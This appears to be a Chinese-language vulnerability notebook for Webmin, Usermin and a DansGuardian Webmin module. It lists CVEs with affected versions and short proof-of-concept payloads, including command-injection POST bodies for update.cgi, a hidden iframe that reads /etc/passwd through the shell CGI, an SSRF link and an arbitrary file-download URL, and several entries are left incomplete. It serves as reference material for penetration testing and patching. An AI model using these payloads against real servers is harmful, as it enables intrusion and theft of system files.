简介
开发语言
PHP 用途
系统管理
CVE-2019-15642
Date
2019.7 类型
远程代码执行 影响范围
Webmin <= 1.920 复现
POC|EXP
OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd='id'; print "$cmd\n\n";
分析
反序列化导致远程代码执行
CVE-2019-15107
Date
类型
远程代码执行
影响范围
Webmin <= 1.920
前置条件
/password_change.cgi可访问 复现
POC | EXP 分析
CVE-2019-12840
Date
2019.6 类型
远程代码执行 影响范围
v 1.910 复现
POC|EXP
(1)
POST: https://url/package-updates/update.cgi
Data: mode=updates&search=&u=apt/apt&u=;${command};/apt&ok_top=Update+Selected+Packages
mode=updates&search=&u=apt/apt&u=;echo ”124“ > asd.txt;%2Fapt&ok=Update+Selected+Packages
(2)
POST: https://url/package-updates/update.cgi
Data: mode=new&search=&u=;${command};/apt&ok_top=Update+Selected+Packages
分析
XSS vulnerability that leads to Remote Code Execution
Date
类型
XSS导致远程代码执行 影响范围
Webmin version 1.850 前置条件
/at/create_job.cgi可访问CSRF
Date
类型
CSRF 影响范围
Webmin version 1.850
SSRF
Date
类型
SSRF 影响范围
Webmin version 1.850 复现
POC|EXP
https://xx.org:8443/tunnel/link.cgi/https://baidu.com
HTML Email Command Execution Vulnerability
Date 类型
远程命令执行
影响范围
Usermin versions <= 1.080
复现
POC|EXP
<iframe src='/shell/index.cgi?cmd=cat+%2Fetc%2Fpasswd&pwd=%2Fhome%2Fv
ictim&history=' height=0 width=0></iframe>
任意文件下载
Date
类型
任意文件下载 影响范围
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.8
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.6
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.5
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.3
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.4.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.4.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7 a
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.6
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5 a
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.4
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.3
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.2.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.2 .0
前置条件
/dansguardian/edit.cgi 可访问 复现
POC|EXP
https://www.xx.com:10000/dansguardian/edit.cgi?file=[FILE]